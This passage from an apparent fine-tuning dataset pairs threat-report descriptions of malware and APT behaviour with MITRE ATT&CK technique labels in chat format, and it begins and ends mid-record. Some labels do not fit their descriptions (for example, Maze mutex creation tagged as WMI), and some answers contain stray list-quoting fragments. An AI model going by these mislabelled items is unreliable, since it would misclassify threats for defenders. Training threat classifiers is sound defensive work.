- "content": "We’ve identified two such files: settings.db sdfg3d.db Here’s how such a database file appears: These are BASE64 encoded and use the same RC4 encryption key as the malware configuration"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the loader checks that it’s not running in a virtualized environment (VMWare or Hyper-V) or under a debugger. For the hardware virtualization check, the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": ".. After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can start and inject code into a new `svchost` process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions of UPPERCUT have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter had downloaded additional tools to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin’s configured list. In this particular instance, the malware will seek out the following file types"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites."
- },
- {
- "role": "assistant",
- "content": "T1608.005 - Link Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze creates a mutex with the name “Global\\x” where x is a special value that is unique per machine. For example, in the next screenshot (some information has been deleted to anonymize the machine used for the analysis) is an example of this behavior"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown can decode, decrypt, and decompress multiple layers of shellcode."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found four different trojaned binaries in use since July 2019. The 5kplayer, driver pack and Firefox trojanized software use a service to achieve persistence. The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to use credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity has been bundled with legitimate software installation files for disguise."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypted a .dll payload using RTL and a custom encryption algorithm. has also obfuscated payloads with base64, XOR, and RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) Appendix C — OwaAuth web shell analysis OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has performed timestomping on victim files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower can take system screenshots and save them to `%AppData%`."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has used PowerShell to download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RogueRobin decodes an embedded executable using base64 and decompresses it."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to upload information about all running processes to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can deliver trojanized versions of software and documents, relying on user execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors discovered removable disks attached to a system."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has used `cmd.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1112 - Modify Registry', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use known credentials to run commands and spawn processes as a local user account."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan has run `C:\\Windows\\system32\\cmd.exe /c cmd /c dir c:\\users\\ /s 2>&1` to discover local accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to gather system information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET saves a screen capture of the victim's system with a numbered filename and \".jpg\" extension. Screen captures are taken at specified intervals based on the system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before being appended to image files, commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "enumerates the current network connections similar to net use ."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use HTTP or HTTPS for command and control to hard-coded C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In particular, the threat actors have exploited CVE-2011-3544, a vulnerability in the Java Runtime Environment, to deliver the HttpBrowser backdoor; and CVE-2010-0738, a vulnerability in JBoss, to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT12 has used the RIPTIDE RAT, which communicates over HTTP with a payload encrypted with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used macros in Word documents that would download a second stage if executed."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can send additional modules over C2 encoded with base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MURKYTOP has the capability to retrieve information about users on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to 2014, IRON LIBERTY used custom malware, primarily Sysmain, Havex, and xFrost (now known as Karagany), combined with commodity penetration testing and tools"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bazar loader is used to download and execute the Bazar backdoor."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After initialization, SUNSPOT monitors running processes for instances of MsBuild.exe, which is part of Microsoft Visual Studio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and comparing it to the corresponding value, 0x53D525. The hashing algorithm used for the comparison is ElfHash and is provided in Python in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sharpshooter downloaded additional payloads after a target was infected with a first-stage downloader."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in Prikormka collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, what happened was that the actor resized the Certificate Table in the digitally signed ‘vac.dll’ and inserted their own data in the Certificate Table so it doesn’t affect the digital signature"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encoded Payload Decoded Payload MD5 Size Import Hash Exported Function Version aa3f303c3319b14b4829fe2faa5999c1 322164 182ee99b4f0803628c30411b1faa9992 l7MF25T96n45qOGWX 5.3.2 126067d634d94c45084cbe1d9873d895 330804 5f45532f947501cf024d84c36e3a19a1 hJvTJcdAU3mNkuvGGq7L 5.4.1 fce54b4886cac5c61eda1e7605483ca3 345812 c1942a0ca397b627019dace26eca78d8 WcuH 5.4.1 Table 2: Static characteristics of UPPERCUT Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker’s interest"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named “Documents.lnk” which executes the DLL via rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used network scanning and enumeration tools, including Ping."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can list information about files in a directory and recently opened or used documents. InvisiMole can also search for specific files by supplied file mask."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can upload files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used a batch script that adds a Registry Run key to establish malware persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can upload files from infected machines after receiving a command with `uploaddd` in the string."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472)."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has used Windows command scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
